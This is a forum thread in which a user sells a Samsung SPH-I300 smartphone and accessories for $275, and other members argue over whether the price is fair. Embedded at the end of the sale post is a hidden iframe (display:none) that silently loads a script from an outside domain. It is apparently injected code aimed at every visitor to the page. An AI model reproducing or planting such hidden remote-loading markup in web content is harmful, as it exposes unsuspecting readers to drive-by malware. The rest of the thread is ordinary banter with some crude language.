+ Reply to Thread

FS: I300 and Accessories

Sorry if this is violating etiquette rules but wanted to give the users of this forum first crack at this sale before posting it on EBay. (I've switched to a Treo 300.)

Individual items are not for sale, this is an all or nothing sort of deal. As you will see, this is a very complete package and includes just about everything you could ever want for a Samsung SPH-I300.

Asking Price: $275 + shipping (some but not much room for negoatiation)

What's Included:

1. Samsung SPH-I300 in very good condition (screen has had a screen protector on it from day 1)

2. 2 serial hotsync/charging cradles (condition: like new)

3. Snap'N Type keyboard (condition: like new)

4. 3 or 4 screen protectors (condition: new)

5. 1 or 2 extra styli (condition: like new)

6. E&B I300 slipper case w/ belt clip (condition: like new, used VERY sparingly)

7. Sprint leather case (condition: like new)

8. Samsung leather case that was included with the I300(condition: like new)

9. Samsung "crocodile" skin case with belt clip (condition: like new)

10. Sprint car charger (condition: like new)

11. generic Target case with belt/spring clip (condition: good but definitely used)

12. 2 batteries (same two that were included with the I300, they both still hold their charge pretty well, definitely can make it through at least a day with moderate useage on one battery)

13. included Sprint/Samsung manual and CD(s)

I will ship the I300 in its orginal box to you as well, all of the accessories obviously won't fit in that one box though. If you would like some pictures, have questions, or are interested in purchasing, please PM me.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Napoleon Bonaparte Jr.

Talking hello

Marty

I've switched to a Treo 300

( Treo 300 is for a school boys , just a calculator )

Asking Price: $275 + shipping

(Crazyyy , I paid one year ago $350 , You cheating people ,

Marty) .

What's Included:......................

Who care , whats included , THE PHONE IS OLD !

STOP CHEATING PEOPLE , MARTY !

Sprint you are obviously not interested in buying so please don't respond to this thread. I think my price is very fair considering all the accessories I am offering. I am not about to lower my price to something you find acceptable simply because you think the $200+ in accessoories I am offering is negligible. The extra cradle, keyboard, E&B case, car charger, etc. aren't cheap and all are in practically new condition. I would never cheat anyone on this board, this board has given way too much to me for me to even consider it.

And finally, please don't insult my choice of smartphone. Not everyone wants to carry around a brick, have spotty coverage, and get raped for "high-speed" data that's no better than a dialup modem at best.

Unless you have something useful to contribute Sprint (which clearly isn't your previous post or any of your other recent "I love my XDA" ones), kindly go back to your PPC forum.

I agree with everything you said Marty. Hate to see you leave us....hope you're not leaving us. From the auctions I've seen on ebay recently, your asking price seems fair, with most 300s going for around $210-$220 with no accessories.

Originally posted by mjorange
    I agree with everything you said Marty. Hate to see you leave us....hope you're not leaving us. From the auctions I've seen on ebay recently, your asking price seems fair, with most 300s going for around $210-$220 with no accessories.
    MJ, not to worry, I will definitely be around. I LOVE this board and will be anxiously awaiting to see what everyone has to say about the I330, I500, and I700, all 3 of which I am considering as my next smartphone. Fear not, I'm not going anywhere!

i300 knucklehead
    Originally posted by Marty
    MJ, not to worry, I will definitely be around. I LOVE this board and will be anxiously awaiting to see what everyone has to say about the I330, I500, and I700, all 3 of which I am considering as my next smartphone. Fear not, I'm not going anywhere!
    Right there with you chief - selling the i300 but waiting for the perfect smartphone. Although the Tungsten is sharp. Wish the W version would work with Sprint, that is a shame.

i300 knucklehead
    Originally posted by Marty
    Sprint you are obviously not interested in buying so please don't respond to this thread. I think my price is very fair considering all the accessories I am offering. I am not about to lower my price to something you find acceptable simply because you think the $200+ in accessoories I am offering is negligible. The extra cradle, keyboard, E&B case, car charger, etc. aren't cheap and all are in practically new condition. I would never cheat anyone on this board, this board has given way too much to me for me to even consider it.

And finally, please don't insult my choice of smartphone. Not everyone wants to carry around a brick, have spotty coverage, and get raped for "high-speed" data that's no better than a dialup modem at best.

Unless you have something useful to contribute Sprint (which clearly isn't your previous post or any of your other recent "I love my XDA" ones), kindly go back to your PPC forum.
    dude, the IGNORE filter is pretty useful here to reduce the signal/noise ratio... guess who's in mine?

goodbye

Napoleon Bonaparte Jr.

Exclamation hello

Marty
    I think my price is very fair considering all the accessories I am offering.

You cheating people , Marty !

Your price is to high !

If you want to have friends on the forum ,

just be friendly , its easy to understand .

Have you bothered to read the rest of the posts in this thread? Apparently, I am not the only one who feels my price is fair. Better yet, have you looked at what the I300s are going for on EBay? Hmmm...$75 max for over $200 worth of accessories, all in pracrtically new condition....I may be the one that's being cheated here.

"If I want to have friends on the forum, just be friendly..."

Sprint, when someone starts spreading rumors that my price is unfair (to say the least) potentially hurting my chances at selling and then starts trashing my new device, the last thing I am going to do is be friendly to you. I suggest you be a little more cautious of what you say, Sprint. As you can see from the other posts in this thread, you certainly aren't making any friends. I recommend you take your own advice, "its easy to understand."

sprint you have a pm from me.

Napoleon Bonaparte Jr.

Lightbulb hello MJ

God Bless You , God Loves You

Administrator

Arrow

Originally posted by mjorange
    sprint you have a pm from me.
    uh-ohh... daddy's pissed!! :0